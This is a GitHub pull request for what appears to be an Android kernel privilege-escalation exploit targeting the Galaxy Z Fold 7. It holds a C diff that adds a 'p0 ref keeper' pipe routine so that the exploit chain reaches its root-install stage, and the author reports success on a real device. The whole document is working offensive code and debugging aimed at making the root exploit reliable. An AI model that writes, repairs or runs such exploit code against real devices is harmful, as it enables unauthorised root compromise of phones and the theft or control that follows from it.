### PR TITLE
fix: Z Fold 7 exploit fails on v0.2.6 — p0 reference keeper not started

### DIFF
--- a/src/common.h
+++ b/src/common.h
@@ -451,6 +451,7 @@ uint64_t scan_p0_virtual_base_pointer(void);
 #endif
 int restore_p0_oracle_pages(int fd);
 int run_p0_pipe_oracle_diagnostic(int fd);
+void start_p0_ref_keeper(void);
 #endif
 
 int install_android_root(int fd);

--- a/src/main.c
+++ b/src/main.c
@@ -580,6 +580,7 @@ int run_exploit(int argc, char **argv) {
             attempt, fops_fresh_page_attempts);
   }
 #else
+  start_p0_ref_keeper();
   for (int attempt = 1; attempt <= 1; attempt++) {
     int triggered = app_trigger_fops_slide_route();
     pr_info("app fops stage=trigger-return attempt=%d triggered=%d\n",

--- a/src/pipe.c
+++ b/src/pipe.c
@@ -931,6 +931,22 @@ static void spawn_p0_ref_keeper(int retained_pipe_index) {
   }
 }
 
+void start_p0_ref_keeper(void) {
+  if (p0_gate_holders_initialized) {
+    return;
+  }
+  for (size_t i = 0; i < PIPE_RECLAIM; i++) {
+    p0_gate_holders[i][0] = -1;
+    p0_gate_holders[i][1] = -1;
+  }
+  if (pipe2(p0_gate_holders[0], O_CLOEXEC) < 0) {
+    pr_error("p0 ref keeper gate pipe failed errno=%d\n", errno);
+    return;
+  }
+  p0_gate_holders_initialized = 1;
+  spawn_p0_ref_keeper(0);
+}
+
 int prepare_p0_pipe_oracle(void) {
   _Static_assert(sizeof(struct user_pipe_buffer) == 0x28,
                  "unexpected pipe_buffer size");


### PR DESCRIPTION
## Problem

v0.2.6 causes 100% exploit failure on Galaxy Z Fold 7 (q7q-F966USQU9BZDN).
v0.2.5 works fine, v0.2.6 fails deterministically at the p0 reference holder stage.

Root cause: targets with `APP_PHYS_P0_ORACLE=1` but without `APP_REQUIRE_FRESH_P0_SESSION`
never call `verify_p0_pipe_oracle_gate()`, which is the only place `spawn_p0_ref_keeper()`
is invoked. Without the keeper, the daemon never binds the `cve43499_roothold` socket,
and `install_android_root()` always fails.

## Fix

Added `start_p0_ref_keeper()` that initializes the gate pipe and spawns the keeper,
called in the non-fresh-session code path before the exploit trigger.

Modified files:
- `src/pipe.c` — new `start_p0_ref_keeper()` function
- `src/common.h` — declaration
- `src/main.c` — call site

## Tested

Verified on Galaxy Z Fold 7 (F966USQU9BZDN), succeeded on attempt 5/24.
<img width="1968" height="1981" alt="WhatsApp Image 2026-08-13 at 11 40 17 AM" src="https://github.com/user-attachments/assets/253351c4-d606-4d7c-88af-768b14b714c1" />
